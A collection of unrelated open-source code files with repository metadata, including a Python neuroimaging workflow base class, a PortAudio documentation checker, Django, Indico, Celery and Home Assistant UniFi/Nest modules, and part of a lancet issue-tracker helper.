:type commands: An iterable (in case of multiple commands - the usual
case), a string in case of a single command.
:param parallel: Enables execution in parallel mode
:type parallel: bool
"""
# (https://docs.loni.org/wiki/PBS_Job_Chains_and_Dependencies)
# http://librarian.phys.washington.edu/athena/index.php/Job_Submission_Tutorial#NEW:_PBS_Job_Dependencies_.28advanced.29
# http://beige.ucs.indiana.edu/I590/node45.html
# If single command is provided, it is supposed to be a string. Convert
# to list with a single element.
if not hasattr(commands, "__getitem__"):
commands = [commands]
# In the regular execution mode (no dry-run) the commands can be
# executed serially or in parallel. In the latter case, all the commands
# are dumped into a file and executed with GNU parallel.
if not self.options.dryRun:
command_filename = \
os.path.join(self.options.workdir, str(time.time()))
open(command_filename, 'w').write("\n".join(map(str, commands)))
self._logger.info("Saving command file: %s", command_filename)
if parallel:
cluster_file = os.path.join(os.getenv("HOME"), '.pos_cluster')
if os.path.isfile(cluster_file):
command_str = 'parallel --sshloginfile %s -a %s -k -j %d --env PATH --env PYTHONPATH --env LD_LIBRARY_PATH --workdir %s' %\
(cluster_file, command_filename, self.options.cpuNo, os.getcwd())
else:
command_str = 'parallel -a %s -k -j %d' %\
(command_filename, self.options.cpuNo)
else:
command_str = 'bash -x %s' % command_filename
self._logger.debug("Executing: %s", command_str)
# Tested against execution of multiple commands
stdout, stderr = sub.Popen(command_str,
stdout=sub.PIPE, stderr=sub.PIPE,
shell=True, close_fds=True).communicate()
self._logger.debug("Last commands stdout: %s", stdout)
self._logger.debug("Last commands stderr: %s", stderr)
return stdout, stderr
else:
print "\n".join(map(str, commands))
def launch(self):
"""
The workflow execution routine. Has to be customized and documented in
every subclass; this stub only raises NotImplementedError. Every
`launch` method has to invoke `_pre_launch()` and
`_post_launch()` as they are required to run the workflow properly.
"""
raise NotImplementedError, "Virtual method executed."
def _pre_launch(self):
"""
A generic just-before-execution routine. Should be customized in
subclasses.
"""
pass
def _post_launch(self):
"""
A generic post-execution routine. Should be customized in subclasses. In
its most basic form, it provides archiving the workflow and removing
the job directory. If you want you can customize it so it will send you
a notification email!
"""
if self.options.archiveWorkDir:
self._archive_workflow()
if self.options.cleanup:
self._clean_up()
def _archive_workflow(self):
"""
This method archives the workdir of the current workflow. The archive
name is taken from the jobId option while the directory of the archive is
provided by the `archiveWorkDir` command line parameter.
There's not much more to tell about this method... well, watch out
as the archive may be really big (by which I mean really big). Be prepared
for gigabytes.
"""
archive_filename = os.path.join(self.options.archiveWorkDir,
self.options.jobId)
self._logger.info("Archive basename: %s", \
generic_workflow._basename(archive_filename))
self._logger.info("Archiving the job directory to: %s",\
archive_filename)
compress_command = pos_wrappers.compress_wrapper(
archive_filename = archive_filename,
pathname = self.options.workdir)
# Well, sometimes you don't want to execute the archive command
# especially when no other command was executed.
if not self.options.dryRun:
compress_command()
else:
print compress_command
def _clean_up(self):
"""
Erases the job's working directory.
"""
self._logger.info("Removing job directory.")
self._rmdir(self.options.workdir)
@classmethod
def _getCommandLineParser(cls):
"""
"""
parser = OptionParser(usage=cls._usage)
workflowSettings = OptionGroup(parser, 'General workflow settings')
workflowSettings.add_option('--jobId', '-j', dest='jobId', type='str',
default=None, help='Job identifier. An optional value identifying this particular workflow. If omitted, the jobId will be generated automatically.')
workflowSettings.add_option('--workDir', '-d', dest='workdir', type='str',
default=None, help='Sets the working directory of the process. Overrides the "--disableSharedMemory" switch.')
workflowSettings.add_option('--loglevel', dest='loglevel', type='str',
default='WARNING', help='Loglevel: CRITICAL | ERROR | WARNING | INFO | DEBUG')
workflowSettings.add_option('--logFilename', dest='logFilename',
default=None, action='store', type='str',
help='Sets dumping the execution log file instead stderr')
workflowSettings.add_option('--disableSharedMemory', default=False,
dest='disableSharedMemory', action='store_const', const=True,
help='Forces script to use hard drive to store the workflow data instead of using RAM disk.')
workflowSettings.add_option('--specimenId', default=None,
dest='specimenId', action='store', type='str',
help='Identifier of the specimen. Providing the ID is obligatory. Script will not run without providing specimen ID.')
workflowSettings.add_option('--dryRun', default=False,
action='store_const', const=True, dest='dryRun',
help='Prints the commands to stdout instead of executing them')
workflowSettings.add_option('--cpuNo', '-n', default=None,
type='int', dest='cpuNo',
help='Set a number of CPUs for parallel processing. If skipped, the number of CPUs will be automatically detected.')
workflowSettings.add_option('--archiveWorkDir',default=None,
type='str', dest='archiveWorkDir',
help='Compresses (.tgz) and moves workdir to a given directory')
workflowSettings.add_option('--cleanup', default=False,
dest='cleanup', action='store_const', const=True,
help='Remove the workflow directory after calculations. Use when you are sure that the workflow will execute correctly.')
parser.add_option_group(workflowSettings)
return parser
@classmethod
def parseArgs(cls):
parser = cls._getCommandLineParser()
(options, args) = parser.parse_args()
return (options, args)
class output_volume_workflow(generic_workflow):
"""
This class is designed to support workflows providing a volume as one of the
outputs. It handles additional command line parameters for defining the
origin, spacing, orientation, type, anatomical orientation and many
others.
>>> options, args = output_volume_workflow.parseArgs()
>>> options.parallel = False
>>> w = output_volume_workflow(options, args) #doctest: +ELLIPSIS
Executing: mkdir -p /dev/shm/output_volume_workflow_...
<BLANKLINE>
<BLANKLINE>
>>> print w.execute(["sleep 1"], parallel=False)[0] == ''
True
>>> print w.execute(["sleep 1"], parallel=False)[1].strip() == "+ sleep 1"
True
"""
__output_vol_command_line_args_help = {}
__output_vol_command_line_args_help['outputVolumeOrigin'] =\
"""Set the origin of the image -- the center of the voxel (0,0,0) in the image.
Should be specified in millimeters. Default: 0,0,0."""
__output_vol_command_line_args_help['outputVolumeScalarType'] =\
"""Specifies the pixel type for the output image. Data type for output volume's
voxels. The allowed values are: char | uchar | short | ushort | int | uint |
float | double. The default type, unlike in Convert3d, is char."""
__output_vol_command_line_args_help['outputVolumeSpacing'] =\
"""Sets the voxel spacing of the image. A vector of three positive values is
required (e.g. '0.5 0.5 0.5'). The spacing is assumed to be provided in
millimeters. The default spacing is 1x1x1mm."""
__output_vol_command_line_args_help['outputVolumeResample'] =\
"""Requests additional resampling of the output volume. The resampling is applied
_before_ setting the output spacing. The resampling settings are provided as
three positive float values corresponding to the resampling factor (e.g. 0.25
1.0 0.75). Watch out when combining this with other parameters like setting
spacing. By default there is no resampling."""
__output_vol_command_line_args_help['outputVolumePermutationOrder'] =\
"""Apply axes permutation. Permutation has to be provided as sequence of 3
integers separated by space. Identity (0,1,2) permutation is a default one."""
__output_vol_command_line_args_help['outputVolumeOrientationCode'] =\
"""Set the orientation of the image using one of 48 canonical orientations. The
orientation describes the mapping from the voxel coordinate system (i,j,k) to
the physical coordinate system (x,y,z). In the voxel coordinate system, i runs
along columns of voxels, j runs along rows of voxels, and k runs along slices
of voxels. It is assumed (by the NIFTI convention) that the axes of the
physical coordinate system run as follows: x from (L)eft to (R)ight, y from
(P)osterior to (A)nterior, z from (I)nferior to (S)uperior. (the explanation
is copied from Convert3D documentation:
http://www.itksnap.org/pmwiki/pmwiki.php?n=Convert3D.Documentation)"""
__output_vol_command_line_args_help['setInterpolation'] =\
"""Specifies the interpolation method for resampling the output volume. Be default
the linear interpolation is set. The other allowed values are: NearestNeighbor
| Linear | Cubic | Sinc | Gaussian."""
__output_vol_command_line_args_help['setFlip'] =\
"""Select axes to flip. Selection has to be provided as sequence of three
numbers. E.g. \'0 0 1\' will flip the z axis."""
@classmethod
def _getCommandLineParser(cls):
parser = generic_workflow._getCommandLineParser()
outputVolumeSettings = \
OptionGroup(parser, 'Output volumes settings')
outputVolumeSettings.add_option('--outputVolumeOrigin', dest='outputVolumeOrigin',
default=[0.,0.,0.], action='store', type='float', nargs =3,
help=cls.__output_vol_command_line_args_help['outputVolumeOrigin'])
outputVolumeSettings.add_option('--outputVolumeScalarType', default='uchar',
type='choice', dest='outputVolumeScalarType',
choices=['char','uchar','short','ushort','int','uint','float','double'],
help=cls.__output_vol_command_line_args_help['outputVolumeScalarType'])
outputVolumeSettings.add_option('--outputVolumeSpacing', default=[1,1,1],
type='float', nargs=3, dest='outputVolumeSpacing',
help=cls.__output_vol_command_line_args_help['outputVolumeSpacing'])
outputVolumeSettings.add_option('--outputVolumeResample',
dest='outputVolumeResample', type='float', nargs=3, default=None,
help=cls.__output_vol_command_line_args_help['outputVolumeResample'])
outputVolumeSettings.add_option('--outputVolumePermutationOrder', default=[0,1,2],
type='int', nargs=3, dest='outputVolumePermutationOrder',
help=cls.__output_vol_command_line_args_help['outputVolumePermutationOrder'])
outputVolumeSettings.add_option('--outputVolumeOrientationCode',
dest='outputVolumeOrientationCode', type='str', default='RAS',
help=cls.__output_vol_command_line_args_help['outputVolumeOrientationCode'])
outputVolumeSettings.add_option('--setInterpolation',
dest='setInterpolation', type='str', default=None,
help=cls.__output_vol_command_line_args_help['setInterpolation'])
outputVolumeSettings.add_option('--setFlip',
dest='setFlip', type='str', default=None,
help=cls.__output_vol_command_line_args_help['setFlip'])
parser.add_option_group(outputVolumeSettings)
return parser
class enclosed_workflow(generic_workflow):
"""
A base for workflows not utilizing temporary directories.
This workflow is dedicated to pipelines that don't use
working directories and which do not store temporary data during processing.
It has some features disabled regarding job dirs, parallel execution,
cleaning up the working directories, etc.
>>> options, args = enclosed_workflow.parseArgs()
>>> w = enclosed_workflow(options, args) #doctest: +ELLIPSIS
"""
def _initializeOptions(self):
super(enclosed_workflow, self)._initializeOptions()
# Force workdir to be 'skip' as we do not want to create
# a job directory for this script. Also, we set dryRun and
# cleanup to False, as this workflow does not use any
# directories. Everything is done in memory.
# Moreover, we set cpuNo to 1 as it does not matter :)
self.options.workdir = self._DO_NOT_CREATE_WORKDIR
self.options.dryRun = False
self.options.cleanup = False
self.options.cpuNo = 1
if __name__ == 'possum.pos_wrapper_skel':
import doctest
doctest.testmod()
|
{
"content_hash": "9beebc2de36ceadf4aa434d831382a3c",
"timestamp": "",
"source": "github",
"line_count": 582,
"max_line_length": 164,
"avg_line_length": 43.1426116838488,
"alnum_prop": 0.6473376080289935,
"repo_name": "chrisfilo/poSSum",
"id": "af6eb386a825b147f642e4b784243a0b8639b9ed",
"size": "25152",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "possum/pos_wrapper_skel.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Makefile",
"bytes": "7378"
},
{
"name": "Python",
"bytes": "469293"
},
{
"name": "Shell",
"bytes": "71781"
}
],
"symlink_target": ""
}
|
import os
import os.path
import string
paRootDirectory = '../../'
paHtmlDocDirectory = os.path.join( paRootDirectory, "doc", "html" )
## Script to check documentation status
## this script assumes that html doxygen documentation has been generated
##
## it then walks the entire portaudio source tree and checks that
## - every source file (.c,.h,.cpp) has a doxygen comment block containing
## - a @file directive
## - a @brief directive
## - a @ingroup directive
## - it also checks that a corresponding html documentation file has been generated.
##
## This can be used as a first-level check to make sure the documentation is in order.
##
## The idea is to get a list of which files are missing doxygen documentation.
##
## How to run:
## $ cd doc/utils
## $ python checkfiledocs.py
def oneOf_a_in_b(a, b):
for x in a:
if x in b:
return True
return False
# recurse from top and return a list of all files with the given
# extensions. ignore .svn directories. return absolute paths
def recursiveFindFiles( top, extensions, dirBlacklist, includePaths ):
result = []
for (dirpath, dirnames, filenames) in os.walk(top):
if not oneOf_a_in_b(dirBlacklist, dirpath):
for f in filenames:
if os.path.splitext(f)[1] in extensions:
if includePaths:
result.append( os.path.abspath( os.path.join( dirpath, f ) ) )
else:
result.append( f )
return result
# generate the html file name that doxygen would use for
# a particular source file. this is a brittle conversion
# which i worked out by trial and error
def doxygenHtmlDocFileName( sourceFile ):
return sourceFile.replace( '_', '__' ).replace( '.', '_8' ) + '.html'
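# Illustrative example (editor's note, not part of the original script):
# doxygenHtmlDocFileName('pa_front.c') -> 'pa__front_8c.html'
# ('_' becomes '__', '.' becomes '_8', then '.html' is appended).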
sourceFiles = recursiveFindFiles( os.path.join(paRootDirectory,'src'), [ '.c', '.h', '.cpp' ], ['.svn', 'mingw-include'], True );
sourceFiles += recursiveFindFiles( os.path.join(paRootDirectory,'include'), [ '.c', '.h', '.cpp' ], ['.svn'], True );
docFiles = recursiveFindFiles( paHtmlDocDirectory, [ '.html' ], ['.svn'], False );
currentFile = ""
def printError( f, message ):
global currentFile
if f != currentFile:
currentFile = f
print f, ":"
print "\t!", message
for f in sourceFiles:
if not doxygenHtmlDocFileName( os.path.basename(f) ) in docFiles:
printError( f, "no doxygen generated doc page" )
s = file( f, 'rt' ).read()
if not '/**' in s:
printError( f, "no doxygen /** block" )
if not '@file' in s:
printError( f, "no doxygen @file tag" )
if not '@brief' in s:
printError( f, "no doxygen @brief tag" )
if not '@ingroup' in s:
printError( f, "no doxygen @ingroup tag" )
|
{
"content_hash": "51c9d110918424aa7ff521e5f0b9f5af",
"timestamp": "",
"source": "github",
"line_count": 87,
"max_line_length": 129,
"avg_line_length": 32.05747126436781,
"alnum_prop": 0.627465041233417,
"repo_name": "powerboat9/USTL",
"id": "5d6b58518f7c97eed0e37c9a08fbcf14b3377f89",
"size": "2789",
"binary": false,
"copies": "55",
"ref": "refs/heads/master",
"path": "src/portaudio/doc/utils/checkfiledocs.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Batchfile",
"bytes": "844"
},
{
"name": "C",
"bytes": "3021601"
},
{
"name": "C++",
"bytes": "694845"
},
{
"name": "CMake",
"bytes": "23016"
},
{
"name": "HTML",
"bytes": "3941"
},
{
"name": "Java",
"bytes": "43276"
},
{
"name": "M4",
"bytes": "7535"
},
{
"name": "Makefile",
"bytes": "130739"
},
{
"name": "Python",
"bytes": "27318"
},
{
"name": "Shell",
"bytes": "334567"
}
],
"symlink_target": ""
}
|
from django.shortcuts import render
# =========================================================================
# Renders about.html page
# =========================================================================
def about(request):
return render(request, "about.html", {})
|
{
"content_hash": "a76c484318ddb6febffb281a2e9b3c9f",
"timestamp": "",
"source": "github",
"line_count": 8,
"max_line_length": 75,
"avg_line_length": 35.125,
"alnum_prop": 0.33451957295373663,
"repo_name": "brittdawn/django-webstore",
"id": "9121cb38e4c27122f7ded99e36f440a432d76f3f",
"size": "281",
"binary": false,
"copies": "2",
"ref": "refs/heads/master",
"path": "webstore/views.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "CSS",
"bytes": "333244"
},
{
"name": "HTML",
"bytes": "20808"
},
{
"name": "JavaScript",
"bytes": "527034"
},
{
"name": "Python",
"bytes": "48144"
}
],
"symlink_target": ""
}
|
import os
import sys
if __name__ == "__main__":
os.environ.setdefault("DJANGO_SETTINGS_MODULE", "ldpoznan.settings")
from django.core.management import execute_from_command_line
execute_from_command_line(sys.argv)
|
{
"content_hash": "8a0b619e5962336bb91962a26140f44d",
"timestamp": "",
"source": "github",
"line_count": 9,
"max_line_length": 72,
"avg_line_length": 25.444444444444443,
"alnum_prop": 0.7117903930131004,
"repo_name": "esenti/ld-poznan",
"id": "e58587cb4c68216f5d1ed7f7988cc9f14e751983",
"size": "251",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "ldpoznan/manage.py",
"mode": "33261",
"license": "mit",
"language": [
{
"name": "CSS",
"bytes": "1970"
},
{
"name": "HTML",
"bytes": "4077"
},
{
"name": "Python",
"bytes": "11012"
}
],
"symlink_target": ""
}
|
from __future__ import unicode_literals
from indico.core.db import db
from indico.core.db.sqlalchemy import PyIntEnum
from indico.modules.events.editing.models.editable import EditableType
from indico.util.string import format_repr, return_ascii
class EditingReviewCondition(db.Model):
__tablename__ = 'review_conditions'
__table_args__ = {'schema': 'event_editing'}
id = db.Column(
db.Integer,
primary_key=True
)
type = db.Column(
PyIntEnum(EditableType),
nullable=False
)
event_id = db.Column(
db.Integer,
db.ForeignKey('events.events.id'),
index=True,
nullable=False
)
event = db.relationship(
'Event',
lazy=True,
backref=db.backref(
'editing_review_conditions',
cascade='all, delete-orphan',
lazy=True
)
)
file_types = db.relationship(
'EditingFileType',
secondary='event_editing.review_condition_file_types',
collection_class=set,
lazy=False,
backref=db.backref(
'review_conditions',
collection_class=set,
lazy=True
)
)
# relationship backrefs:
# - file_types (EditingFileType.review_conditions)
@return_ascii
def __repr__(self):
return format_repr(self, 'id', 'event_id')
db.Table(
'review_condition_file_types',
db.metadata,
db.Column(
'review_condition_id',
db.ForeignKey('event_editing.review_conditions.id'),
primary_key=True,
autoincrement=False,
index=True
),
db.Column(
'file_type_id',
db.ForeignKey('event_editing.file_types.id'),
primary_key=True,
autoincrement=False,
index=True
),
schema='event_editing'
)
|
{
"content_hash": "ab0c2f12e188a2bdfc63b280a81438e1",
"timestamp": "",
"source": "github",
"line_count": 75,
"max_line_length": 70,
"avg_line_length": 24.373333333333335,
"alnum_prop": 0.5924507658643327,
"repo_name": "mic4ael/indico",
"id": "8201095087f50a37b0def3198e1c4348cd0199ca",
"size": "2042",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "indico/modules/events/editing/models/review_conditions.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "CSS",
"bytes": "553825"
},
{
"name": "HTML",
"bytes": "1375160"
},
{
"name": "JavaScript",
"bytes": "1852830"
},
{
"name": "Mako",
"bytes": "1340"
},
{
"name": "Python",
"bytes": "4612709"
},
{
"name": "Shell",
"bytes": "2665"
},
{
"name": "TeX",
"bytes": "23292"
},
{
"name": "XSLT",
"bytes": "1504"
}
],
"symlink_target": ""
}
|
"""threaded module."""
# Standard Library
import typing
# Local Implementation
from ._asynciotask import AsyncIOTask
from ._asynciotask import asynciotask
from ._threaded import Threaded
from ._threaded import threaded
from ._threadpooled import ThreadPooled
from ._threadpooled import threadpooled
try:
# Local Implementation
from ._version import version as __version__
except ImportError:
pass
__all__ = (
"ThreadPooled",
"Threaded",
"threadpooled",
"threaded",
"AsyncIOTask",
"asynciotask",
) # type: typing.Tuple[str, ...]
__author__ = "Alexey Stepanov"
__author_email__ = "penguinolog@gmail.com"
__maintainers__ = {
"Alexey Stepanov": "penguinolog@gmail.com",
"Antonio Esposito": "esposito.cloud@gmail.com",
"Dennis Dmitriev": "dis-xcom@gmail.com",
}
__url__ = "https://github.com/python-useful-helpers/threaded"
__description__ = "Decorators for running functions in Thread/ThreadPool/IOLoop"
__license__ = "Apache License, Version 2.0"
|
{
"content_hash": "60b06172bdca33819b0c82f9819b7279",
"timestamp": "",
"source": "github",
"line_count": 38,
"max_line_length": 80,
"avg_line_length": 26.263157894736842,
"alnum_prop": 0.7004008016032064,
"repo_name": "penguinolog/threaded",
"id": "eac6f39a0fabc07463ab0dcd8f70d41207a71cfd",
"size": "1633",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "threaded/__init__.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Makefile",
"bytes": "973"
},
{
"name": "Python",
"bytes": "67156"
},
{
"name": "Shell",
"bytes": "2607"
}
],
"symlink_target": ""
}
|
""" test_comments.py """
import datetime
from unittest import TestCase
from django.contrib.auth.models import User
from django.contrib.contenttypes.models import ContentType
from django.contrib.flatpages.models import FlatPage
from django.contrib.sites.models import Site
from mockito import mock, when
from marimo_comments import constants
from marimo_comments.models import MarimoCommentBucket, MarimoComment
class MarimoCommentTest(TestCase):
def setUp(self):
self.user_data = {
'pk': 1,
'username': 'bharo',
'email': 'bob@haro.com',
}
self.user = User(**self.user_data)
self.site = Site(pk=1, name='foo', domain='www.foo.com')
self.datetime = datetime.datetime(2010, 12, 13, 10, 15, 0)
self.flatpage = FlatPage(pk=1, title='test', content='my entry blah blah blah')
self.test_content_type = ContentType(pk=101, name='Entry', app_label='example', model='entry')
self.bucket = MarimoCommentBucket(pk=1, content_type=self.test_content_type,
object_id=self.flatpage.pk, originating_site=self.site)
self.comment = MarimoComment(pk=1, text='Test Comment', bucket=self.bucket, user=self.user,
submit_date=self.datetime)
def test_comment_userinfo(self):
assert self.comment.userinfo['name'] == self.user_data['username']
def test_comment_userinfo_email(self):
assert self.comment.userinfo['email'] == self.user_data['email']
assert self.comment.email == self.user_data['email']
def test_comment_userinfo_with_first_last(self):
self.user.first_name = 'Bob'
self.user.last_name = 'Haro'
assert self.comment.userinfo['name'] == 'Bob Haro'
assert self.comment.name == 'Bob Haro'
def test_get_page_number_under_page_limit(self):
mock_query_set = mock()
when(MarimoComment.objects).filter(bucket=self.bucket, submit_date__lt=self.datetime).thenReturn(mock_query_set)
when(mock_query_set).count().thenReturn(constants.COMMENTS_PER_PAGE - 1)
assert self.comment.get_page_number() == 1
def test_get_page_number_over_page_limit(self):
mock_query_set = mock()
when(MarimoComment.objects).filter(bucket=self.bucket, submit_date__lt=self.datetime).thenReturn(mock_query_set)
when(mock_query_set).count().thenReturn(constants.COMMENTS_PER_PAGE)
assert self.comment.get_page_number() == 2
def test_comment_get_absolute_url(self):
when(ContentType.objects).get(id=101).thenReturn(self.test_content_type)
when(ContentType).get_object_for_this_type().thenReturn(self.flatpage)
assert '#/comment/p1/c1/' == self.comment.get_absolute_url()
|
{
"content_hash": "0dfdb58014708dc048c14efa76073b24",
"timestamp": "",
"source": "github",
"line_count": 64,
"max_line_length": 120,
"avg_line_length": 43.578125,
"alnum_prop": 0.6629616349946217,
"repo_name": "brandonivey/marimo-comments",
"id": "7f1caffb51cf8afcfa608e4e39a67675eabd3dc5",
"size": "2789",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "marimo_comments/tests/test_comments.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Python",
"bytes": "31938"
}
],
"symlink_target": ""
}
|
"""myapp.py
Usage:
(window1)$ python myapp.py -l info
(window2)$ python
>>> from myapp import add
>>> add.delay(16, 16).get()
32
You can also specify the app to use with celeryd::
$ celeryd -l info --app=myapp.celery
"""
from celery import Celery
celery = Celery("myapp")
celery.conf.update(BROKER_HOST="localhost")
@celery.task
def add(x, y):
return x + y
if __name__ == "__main__":
celery.worker_main()
|
{
"content_hash": "7b0d916df37d1b060481afe31e2cce35",
"timestamp": "",
"source": "github",
"line_count": 30,
"max_line_length": 50,
"avg_line_length": 14.8,
"alnum_prop": 0.6216216216216216,
"repo_name": "frac/celery",
"id": "40ca6b5e8e72baf09b6e05328641c72301621c2e",
"size": "444",
"binary": false,
"copies": "2",
"ref": "refs/heads/master",
"path": "examples/app/myapp.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [
{
"name": "Python",
"bytes": "975783"
},
{
"name": "Shell",
"bytes": "30099"
}
],
"symlink_target": ""
}
|
"""Support for Nest sensors that dispatches between API versions."""
from homeassistant.config_entries import ConfigEntry
from homeassistant.helpers.typing import HomeAssistantType
from .const import DATA_SDM
from .sensor_legacy import async_setup_legacy_entry
from .sensor_sdm import async_setup_sdm_entry
async def async_setup_entry(
hass: HomeAssistantType, entry: ConfigEntry, async_add_entities
) -> None:
"""Set up the sensors."""
if DATA_SDM not in entry.data:
await async_setup_legacy_entry(hass, entry, async_add_entities)
return
await async_setup_sdm_entry(hass, entry, async_add_entities)
|
{
"content_hash": "66113faf40cd4893f252299bcf91e691",
"timestamp": "",
"source": "github",
"line_count": 19,
"max_line_length": 71,
"avg_line_length": 33.526315789473685,
"alnum_prop": 0.750392464678179,
"repo_name": "soldag/home-assistant",
"id": "6245c5d83d02f5323fc8039fe8efd6b4ae764d61",
"size": "637",
"binary": false,
"copies": "3",
"ref": "refs/heads/dev",
"path": "homeassistant/components/nest/sensor.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Python",
"bytes": "19025087"
},
{
"name": "Shell",
"bytes": "6846"
}
],
"symlink_target": ""
}
|
"""Integration to UniFi Network and its various features."""
from homeassistant.const import EVENT_HOMEASSISTANT_STOP
from homeassistant.core import callback
from homeassistant.helpers import device_registry as dr
from homeassistant.helpers.device_registry import CONNECTION_NETWORK_MAC
from .const import (
ATTR_MANUFACTURER,
CONF_CONTROLLER,
DOMAIN as UNIFI_DOMAIN,
LOGGER,
UNIFI_WIRELESS_CLIENTS,
)
from .controller import UniFiController
from .services import async_setup_services, async_unload_services
SAVE_DELAY = 10
STORAGE_KEY = "unifi_data"
STORAGE_VERSION = 1
async def async_setup(hass, config):
"""Integration doesn't support configuration through configuration.yaml."""
hass.data[UNIFI_WIRELESS_CLIENTS] = wireless_clients = UnifiWirelessClients(hass)
await wireless_clients.async_load()
return True
async def async_setup_entry(hass, config_entry):
"""Set up the UniFi Network integration."""
hass.data.setdefault(UNIFI_DOMAIN, {})
# Flat configuration was introduced with 2021.3
await async_flatten_entry_data(hass, config_entry)
controller = UniFiController(hass, config_entry)
if not await controller.async_setup():
return False
# Unique ID was introduced with 2021.3
if config_entry.unique_id is None:
hass.config_entries.async_update_entry(
config_entry, unique_id=controller.site_id
)
if not hass.data[UNIFI_DOMAIN]:
async_setup_services(hass)
hass.data[UNIFI_DOMAIN][config_entry.entry_id] = controller
config_entry.async_on_unload(
hass.bus.async_listen_once(EVENT_HOMEASSISTANT_STOP, controller.shutdown)
)
LOGGER.debug("UniFi Network config options %s", config_entry.options)
if controller.mac is None:
return True
device_registry = dr.async_get(hass)
device_registry.async_get_or_create(
config_entry_id=config_entry.entry_id,
configuration_url=controller.api.url,
connections={(CONNECTION_NETWORK_MAC, controller.mac)},
default_manufacturer=ATTR_MANUFACTURER,
default_model="UniFi Network",
default_name="UniFi Network",
)
return True
async def async_unload_entry(hass, config_entry):
"""Unload a config entry."""
controller = hass.data[UNIFI_DOMAIN].pop(config_entry.entry_id)
if not hass.data[UNIFI_DOMAIN]:
async_unload_services(hass)
return await controller.async_reset()
async def async_flatten_entry_data(hass, config_entry):
"""Simpler configuration structure for entry data.
    Keep the controller key layer in case the user rolls back.
"""
data: dict = {**config_entry.data, **config_entry.data[CONF_CONTROLLER]}
if config_entry.data != data:
hass.config_entries.async_update_entry(config_entry, data=data)
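# Hedged illustration (editor's addition): for a pre-2021.3 entry whose options
# are nested under the controller key, the flattening above lifts those keys to
# the top level while keeping the nested layer around for rollbacks. The literal
# "controller" key and the values below are assumptions standing in for
# CONF_CONTROLLER and real entry data.
_EXAMPLE_NESTED = {"controller": {"host": "192.0.2.1", "site": "default"}}
_EXAMPLE_FLAT = {**_EXAMPLE_NESTED, **_EXAMPLE_NESTED["controller"]}
# _EXAMPLE_FLAT == {"controller": {...}, "host": "192.0.2.1", "site": "default"}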
class UnifiWirelessClients:
"""Class to store clients known to be wireless.
This is needed since wireless devices going offline might get marked as wired by UniFi.
"""
def __init__(self, hass):
"""Set up client storage."""
self.hass = hass
self.data = {}
self._store = hass.helpers.storage.Store(STORAGE_VERSION, STORAGE_KEY)
async def async_load(self):
"""Load data from file."""
if (data := await self._store.async_load()) is not None:
self.data = data
@callback
def get_data(self, config_entry):
"""Get data related to a specific controller."""
data = self.data.get(config_entry.entry_id, {"wireless_devices": []})
return set(data["wireless_devices"])
@callback
def update_data(self, data, config_entry):
"""Update data and schedule to save to file."""
self.data[config_entry.entry_id] = {"wireless_devices": list(data)}
self._store.async_delay_save(self._data_to_save, SAVE_DELAY)
@callback
def _data_to_save(self):
"""Return data of UniFi wireless clients to store in a file."""
return self.data
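# Hedged usage sketch (editor's addition): how the wireless-client store above is
# typically exercised. SimpleNamespace stands in for a Home Assistant ConfigEntry,
# and the MAC address is made up; nothing here is called at import time.
from types import SimpleNamespace


def _example_wireless_clients_roundtrip(clients: UnifiWirelessClients) -> set:
    entry = SimpleNamespace(entry_id="example-entry-id")
    clients.update_data({"aa:bb:cc:dd:ee:ff"}, entry)  # schedules a delayed save
    return clients.get_data(entry)  # -> {"aa:bb:cc:dd:ee:ff"}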
|
{
"content_hash": "aed13d9aa0189bdb3e918019d1323b82",
"timestamp": "",
"source": "github",
"line_count": 127,
"max_line_length": 91,
"avg_line_length": 31.496062992125985,
"alnum_prop": 0.68275,
"repo_name": "jawilson/home-assistant",
"id": "180f1d6752f871055f535b6eccf4b6338c144942",
"size": "4000",
"binary": false,
"copies": "2",
"ref": "refs/heads/master",
"path": "homeassistant/components/unifi/__init__.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Dockerfile",
"bytes": "2782"
},
{
"name": "Python",
"bytes": "40129467"
},
{
"name": "Shell",
"bytes": "4910"
}
],
"symlink_target": ""
}
|
import os
import glob
import click
from .settings import LOCAL_CONFIG, load_config
from .git import BranchGetter
from .utils import taskstatus
def get_issue(lancet, issue_id=None):
with taskstatus("Looking up issue on the issue tracker") as ts:
project_id = lancet.config.get("tracker", "project_id")
if issue_id is None:
name_getter = lancet.get_instance_from_config(
"repository", "branch_name_getter", lancet
)
issue_id = name_getter.get_issue_key(lancet.repo.head.name)
issue = lancet.tracker.get_issue(project_id, issue_id)
summary = issue.summary
if len(summary) > 40:
summary = summary[:40] + "..."
ts.ok("Retrieved issue {}: {}".format(issue.id, summary))
return issue
def get_transition(ctx, lancet, issue, to_status):
current_status = issue.status
if current_status != to_status:
transitions = issue.get_transitions(to_status)
if not transitions:
click.secho(
'No transition from "{}" to "{}" found, aborting.'.format(
current_status, to_status
),
fg="red",
bold=True,
)
ctx.exit(1)
elif len(transitions) > 1:
click.secho(
'Multiple transitions found from "{}" to "{}", aborting.'.format(
current_status, to_status
),
fg="red",
bold=True,
)
ctx.exit(1)
else:
transition_id = transitions[0]
else:
transition_id = None
return transition_id
def set_issue_status(lancet, issue, to_status, transition):
with taskstatus('Setting issue status to "{}"'.format(to_status)) as ts:
if transition is not None:
issue.apply_transition(transition)
ts.ok('Issue status set to "{}"'.format(to_status))
else:
ts.ok('Issue already "{}"'.format(to_status))
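# Hedged usage sketch (editor's addition): get_transition and set_issue_status
# are normally chained, so that a missing or ambiguous workflow transition aborts
# before anything is written back. `ctx`, `lancet` and `issue` stand for the
# objects the real CLI commands pass in.
def _example_move_issue(ctx, lancet, issue, to_status="In Progress"):
    transition = get_transition(ctx, lancet, issue, to_status)
    set_issue_status(lancet, issue, to_status, transition)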
def create_issue(
lancet, summary, *, project_id=None, add_to_active_sprint=False
):
with taskstatus("Creating issue") as ts:
if project_id is None:
